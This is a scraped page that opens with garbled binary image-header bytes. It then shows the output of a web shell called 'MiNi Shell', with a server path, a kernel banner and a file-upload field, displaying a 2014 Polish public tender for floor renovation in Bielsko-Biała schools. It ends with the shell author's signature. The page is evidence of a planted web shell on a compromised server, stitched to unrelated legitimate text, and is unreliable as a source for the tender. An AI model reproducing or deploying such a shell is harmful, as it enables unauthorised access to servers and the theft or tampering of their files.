JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140616/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140616/129501-N-2014.html

<p class="kh_header"><b>Bielsko-Biała: Remont podłóg i posadzek  w obiektach oświatowych 
w Bielsku-Białej</b><br>
<b>Numer ogłoszenia: 129501 - 2014; data zamieszczenia: 16.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Bielsku-Białej , plac Ratuszowy 1, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 4971497, faks 033 4971786, 8227539.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.bielsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont podłóg i posadzek  w obiektach oświatowych 
w Bielsku-Białej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont podłóg i posadzek  w obiektach oświatowych 
w Bielsku-Białej. 

Zamówienie realizowane będzie w częściach:

a)	Część 1 - Remont parkietu w budynku Przedszkola nr 9 przy ul. Orzeszkowej 5.  
 Zadanie obejmuje w szczególności: 
roboty przygotowawcze i demontażowe;
mechaniczne szlifowanie podłogi z deszczułek;
szpachlowanie, cyklinowanie i lakierowania parkietów;
uzupełnienie i malowanie tynków po wymianie listew; 
wywóz, utylizację odpadów z rozbiórki;
uporządkowanie miejsca wykonywanych prac.

b)	Część 2 - Remont posadzek w budynku Zespołu Szkół Ogrodniczych 
przy ul. Akademii Umiejętności 1.
Zadanie obejmuje w szczególności:
roboty przygotowawcze i demontażowe;
naprawę podłoża;
ułożenie posadzki z tworzyw sztucznych rulonowych na samopoziomujących masach szpachlowych;
uzupełnienie tynków po demontażu cokołu z płytek; 
wywóz, utylizację odpadów z rozbiórki;
uporządkowanie miejsca wykonywanych prac.

c) Część 3 - Roboty remontowe i renowacyjne w Przedszkolu Integracyjnym nr 2 
przy ul. Łagodnej 16.
Zadanie obejmuje w szczególności:
demontaż posadzek z tworzyw sztucznych;
naprawę posadzki cementowej;
gruntowanie podłoży;
układanie posadzek i cokolików z płytek z kamieni sztucznych i z płytek kamionkowych; 
układanie podłóg z paneli podłogowych
instalowanie drzwi wewnętrznych;
malowanie tynków wewnętrznych;
wywóz, utylizację odpadów z rozbiórki;
uporządkowanie miejsca wykonywanych prac.

d)	Część 4 
Zadanie 1: Remont podłóg w Przedszkolu nr 8 przy ul. Doliny Miętusiej 21.
Zadanie obejmuje w szczególności:
demontaż posadzek z płytek na zaprawie cementowej i posadzek cementowych;
naprawę podłoża;
układanie posadzek z kamieni sztucznych i płytek kamionkowych na zaprawie 	samopoziomującej;
gruntowanie podłoża pod powłoki hydroizolacyjne;
uszczelnianie pomieszczeń i balkonów płynną folią uszczelniającą;
uzupełnienie tynków -  pas do 15 cm ; 
wywóz, utylizację odpadów z rozbiórki;
uporządkowanie miejsca wykonywanych prac.
 
Zadanie 2: Roboty posadzkarskie w Zespole Szkół Medycznych i Ogólnokształcących 
przy ul. Konopnickiej 2 

Zadanie obejmuje w szczególności:
demontaż płytek PCV,  podłogi z deszczółek;
układanie posadzek z płytek z kamieni sztucznych na samopoziomujących masach szpachlowych;
układanie podłóg z wykładzin rulonowych PCV;
wymianę drzwi wewnętrznych z wykuciem ościeżnic;
układanie samopoziomującego podkładu podłogowego pod posadzki z kamieni sztucznych i wykładzin w systemach ogrzewania podłogowego;rozebranie wykładziny ściennej z płytek;
gruntowanie podłoży pod malowanie;
uzupełnienie tynków;
malowanie tynków wewnętrznych z 2-krotnym szpachlowaniem. 
uporządkowanie miejsca wykonywanych prac..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-7, 45.43.21.30-4, 45.42.11.00-5, 45.43.10.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie przewiduje się pobierania wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie Oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie Oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie Oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie Oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie Oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, 
w celu udowodnienia, iż Wykonawca będzie dysponował zasobami niezbędnymi 
do realizacji zamówienia - w przypadku, gdy Wykonawca wskaże, że będzie polegał 
na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów (art. 26 ust. 2b. ustawy Pzp).
Oświadczenie wykonawcy (złożone na formularzu OFERTA PRZETARGOWA - Zał. nr 1.1-1.4 do Siwz.) o :
związaniu ofertą przez okres 30 dni;
zdobyciu informacji koniecznych do sporządzenia oferty;
zapoznaniu się z treścią Specyfikacji istotnych warunków zamówienia 
 wraz z załącznikami, w tym z warunkami przetargu zawartymi w Specyfikacji  
i  przyjęciu tych warunków bez  zastrzeżeń;
zobowiązaniu się do zawarcia umowy na warunkach określonych we wzorze umowy (Załącznik nr 4 do Siwz).
Pełnomocnictwo do reprezentacji Wykonawcy.                              Pełnomocnictwo do reprezentowania podmiotów występujących wspólnie (spółki cywilne, konsorcja). Pełnomocnictwo musi określać zakres umocowania i być podpisane przez osoby uprawnione do reprezentowania Wykonawcy, a w przypadku podmiotów występujących wspólnie przez reprezentantów wszystkich Wykonawców ubiegających się wspólnie o zamówienie.

Informacja (na formularzu OFERTA PRZETARGOWA - Załączniku nr 1.1 - 1.4 do Siwz) o zakresie  zamówienia, którego wykonanie Wykonawca zamierza powierzyć podwykonawcy (w przypadku realizacji zamówienia przy pomocy podwykonawców).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne postanowienia umowy zawarte są we wzorze umowy 
2.	Zmiana umowy może nastąpić w następujących przypadkach:
a)	co do terminu zakończenia zamówienia, który może być przedłużony wskutek:
wystąpienia zdarzeń siły wyższej;
wstrzymania robót przez Zamawiającego albo przerw w wykonywaniu robót powstałych na skutek okoliczności, za które ponosi odpowiedzialność Zamawiający;
b)	co do nieistotnych postanowień umowy,
c)	co do istotnych postanowień umowy, z ważnych powodów, a w szczególności o ile jest ona konieczna i wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.bielsko/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariat Wydziału Inwestycji Urzędu Miejskiego w Bielsku-Białej, Plac Ratuszowy 7, (I piętro, pok. nr 11). 
Cena brutto 1 egz. Siwz:11 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2014 godzina 12:00, miejsce: Sekretariat Wydziału Inwestycji Urzędu Miejskiego w Bielsku-Białej, Plac Ratuszowy 7, (I piętro, pok. nr 11)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont parkietu w budynku Przedszkola nr 9 przy ul. Orzeszkowej 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje w szczególności: 
roboty przygotowawcze i demontażowe;
mechaniczne szlifowanie podłogi z deszczułek;
szpachlowanie, cyklinowanie i lakierowania parkietów;
uzupełnienie i malowanie tynków po wymianie listew; 
wywóz, utylizację odpadów z rozbiórki;
uporządkowanie miejsca wykonywanych prac.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.30-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2 - Remont posadzek w budynku Zespołu Szkół Ogrodniczych przy ul. Akademii Umiejętności 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 - Remont posadzek w budynku Zespołu Szkół Ogrodniczych 
przy ul. Akademii Umiejętności 1.
Zadanie obejmuje w szczególności:
roboty przygotowawcze i demontażowe;
naprawę podłoża;
ułożenie posadzki z tworzyw sztucznych rulonowych na samopoziomujących masach szpachlowych;
uzupełnienie tynków po demontażu cokołu z płytek; 
wywóz, utylizację odpadów z rozbiórki;
uporządkowanie miejsca wykonywanych prac.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Roboty remontowe i renowacyjne w Przedszkolu Integracyjnym nr 2 przy ul. Łagodnej 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje w szczególności:demontaż posadzek z tworzyw sztucznych;
naprawę posadzki cementowej;
gruntowanie podłoży;
układanie posadzek i cokolików z płytek z kamieni sztucznych i z płytek kamionkowych; 
układanie podłóg z paneli podłogowych
instalowanie drzwi wewnętrznych;
malowanie tynków wewnętrznych;
wywóz, utylizację odpadów z rozbiórki;
uporządkowanie miejsca wykonywanych prac.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-7, 45.42.11.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 1 - Remont podłóg w Przedszkolu nr 8 przy ul. Doliny Miętusiej 21

Zadanie 2 - Roboty posadzkarskie w budynku Zespołu Szkół Medycznych
 i Ogólnokształcących przy ul. Konopnickiej 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1: Remont podłóg w Przedszkolu nr 8 przy ul. Doliny Miętusiej 21.

Zadanie obejmuje w szczególności:
demontaż posadzek z płytek na zaprawie cementowej i posadzek cementowych;
naprawę podłoża;
układanie posadzek z kamieni sztucznych i płytek kamionkowych na zaprawie 	samopoziomującej;
gruntowanie podłoża pod powłoki hydroizolacyjne;
uszczelnianie pomieszczeń i balkonów płynną folią uszczelniającą;
uzupełnienie tynków -  pas do 15 cm ; 
wywóz, utylizację odpadów z rozbiórki;
uporządkowanie miejsca wykonywanych prac
 
Zadanie 2: Roboty posadzkarskie w Zespole Szkół Medycznych i Ogólnokształcących przy ul. Konopnickiej 2 

Zadanie  obejmuje w szczególności:
demontaż płytek PCV,  podłogi z deszczółek;
układanie posadzek z płytek z kamieni sztucznych na samopoziomujących masach szpachlowych;
układanie podłóg z wykładzin rulonowych PCV;
wymianę drzwi wewnętrznych z wykuciem ościeżnic;
układanie samopoziomującego podkładu podłogowego pod posadzki z kamieni sztucznych i wykładzin w systemach ogrzewania podłogowego;
rozebranie wykładziny ściennej z płytek;
gruntowanie podłoży pod malowanie;
uzupełnienie tynków;
malowanie tynków wewnętrznych z 2-krotnym szpachlowaniem. 
uporządkowanie miejsca wykonywanych prac.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.43.10.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com